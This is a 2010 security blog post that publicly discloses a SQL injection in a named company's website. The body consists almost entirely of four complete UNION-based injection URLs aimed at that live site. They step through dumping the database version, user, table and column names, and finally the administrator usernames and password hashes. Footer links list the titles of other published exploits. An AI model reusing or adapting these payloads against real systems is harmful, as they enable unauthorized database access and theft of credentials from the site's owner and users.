Critical SQL Injection in www.kmd.com KMD Group of Companies

Home / Hacking, News, Security / Critical SQL Injection in www.kmd.com KMD Group of Companies

August 26, 2010 PlanetCreator 0 Comments 0 tags

PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical SQL Injection (vulnerability) on http://www.kmd.com.sg owned by KMD Group of Companies

These are some information from Vulneral Site http://www.kmd.com.sg :

his vulnerability has been alerted to :- [email protected]

@@version, user(), DB

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,5,6,7,8--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

tbl

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

col

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28column_name%29,5,6,7,8%20from%20information_schema.columns%20where%20table_schema=database%28%29--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

usr & pass hash

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28adm_user_name,0x3a,adm_user_password%29,5,6,7,8%20from%20kmd_admuser--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

We hope that your security staff will look into this issue and fix it as soon as possible.

Thx – Infofreakzzz for sending security updates!

Explore More

Hacking Computers Illegal Violation Access To Machines Cyber Crime

The term â€œhackingâ€ has become one of those words today that are often frowned upon by people who occasionally have no idea what it involves. This homogenization of the signification

Credit card fraud! How to protect ourselves from this identify theft?

Credit card or the plastic money has given us lot of convenience on the good side and hell lot of head ache on the bad side. Credit card fraud as

What are cryptographic attacks?

Cryptographic attacks are methods of evading the security of a cryptographic system by finding weaknesses in such areas as the code, cipher, cryptographic protocol or key management scheme in the

[webapps] dizqueTV 1.5.3 - Remote Code Execution (RCE)
on October 1, 2024 at 12:00 am
dizqueTV 1.5.3 - Remote Code Execution (RCE)
[webapps] openSIS 9.1 - SQLi (Authenticated)
on October 1, 2024 at 12:00 am
openSIS 9.1 - SQLi (Authenticated)
[webapps] reNgine 2.2.0 - Command Injection (Authenticated)
on October 1, 2024 at 12:00 am
reNgine 2.2.0 - Command Injection (Authenticated)
[dos] Windows TCP/IP - RCE Checker and Denial of Service
on August 28, 2024 at 12:00 am
Windows TCP/IP - RCE Checker and Denial of Service
[webapps] Invesalius3 - Remote Code Execution
on August 28, 2024 at 12:00 am
Invesalius3 - Remote Code Execution